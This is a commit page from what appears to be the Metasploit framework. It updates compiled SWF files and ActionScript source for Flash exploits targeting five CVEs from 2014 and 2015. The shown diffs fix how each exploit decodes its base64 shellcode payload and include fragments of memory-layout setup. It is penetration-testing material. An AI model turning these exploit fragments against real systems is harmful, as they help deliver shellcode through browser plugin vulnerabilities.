Skip to content

Commit 2b94983

Browse files
jvazquez-r7jvazquez-r7
committed
Merge solving conflicts branch
2 parents e5d4285 + e9714bf commit 2b94983

File tree

14 files changed

+31
-18
lines changed

14 files changed

+31
-18
lines changed

data/exploits/CVE-2014-0556/msf.swf

-30 Bytes
Binary file not shown.

data/exploits/CVE-2014-0569/msf.swf

88 Bytes
Binary file not shown.

data/exploits/CVE-2014-8440/msf.swf

7 Bytes
Binary file not shown.

data/exploits/CVE-2015-0313/msf.swf

86 Bytes
Binary file not shown.

data/exploits/CVE-2015-0359/msf.swf

127 Bytes
Binary file not shown.

external/source/exploits/CVE-2014-0556/Main.as

Lines changed: 4 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -27,7 +27,10 @@ package
2727
public function Main()
2828
{
2929
var b64:Base64Decoder = new Base64Decoder()
30-
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
30+
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
31+
var pattern:RegExp = / /g;
32+
b64_payload = b64_payload.replace(pattern, "+")
33+
b64.decode(b64_payload)
3134
var payload:String = b64.toByteArray().toString()
3235

3336
for (i = 0; i < bv.length; i++) {

external/source/exploits/CVE-2014-0569/Main.as

Lines changed: 5 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -32,9 +32,11 @@ package
3232
var i:uint = 0
3333
var j:uint = 0
3434

35-
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
36-
payload = b64.toByteArray().toString();
37-
35+
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
36+
var pattern:RegExp = / /g;
37+
b64_payload = b64_payload.replace(pattern, "+")
38+
b64.decode(b64_payload)
39+
payload = b64.toByteArray().toString()
3840
for (i = 0; i < defrag.length; i++) {
3941
defrag[i] = new ByteArray()
4042
defrag[i].length = BYTE_ARRAY_SIZE

external/source/exploits/CVE-2014-8440/Msf.as

Lines changed: 5 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -42,8 +42,11 @@ package
4242
this.object_vector_length = 5770 * 2
4343
this.byte_array_vector_length = 510 * 2
4444

45-
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
46-
payload = b64.toByteArray().toString();
45+
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
46+
var pattern:RegExp = / /g;
47+
b64_payload = b64_payload.replace(pattern, "+")
48+
b64.decode(b64_payload)
49+
payload = b64.toByteArray().toString()
4750

4851
this.initialize_worker_and_ba()
4952
if (!this.trigger())

external/source/exploits/CVE-2015-0313/Main.as

Lines changed: 5 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -39,7 +39,10 @@ public class Main extends Sprite
3939

4040
private function mainThread():void
4141
{
42-
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
42+
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
43+
var pattern:RegExp = / /g;
44+
b64_payload = b64_payload.replace(pattern, "+")
45+
b64.decode(b64_payload)
4346
payload = b64.toByteArray().toString()
4447

4548
ba.length = 0x1000
@@ -204,4 +207,4 @@ public class Main extends Sprite
204207
return addr + i
205208
}
206209
}
207-
}
210+
}

external/source/exploits/CVE-2015-0359/Msf.as

Lines changed: 4 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -43,7 +43,10 @@ package
4343

4444
private function mainThread():void
4545
{
46-
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
46+
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
47+
var pattern:RegExp = / /g;
48+
b64_payload = b64_payload.replace(pattern, "+")
49+
b64.decode(b64_payload)
4750
payload = b64.toByteArray().toString()
4851
ba.length = 0x1000
4952
ba.shareable = true

0 commit comments

Comments
 (0)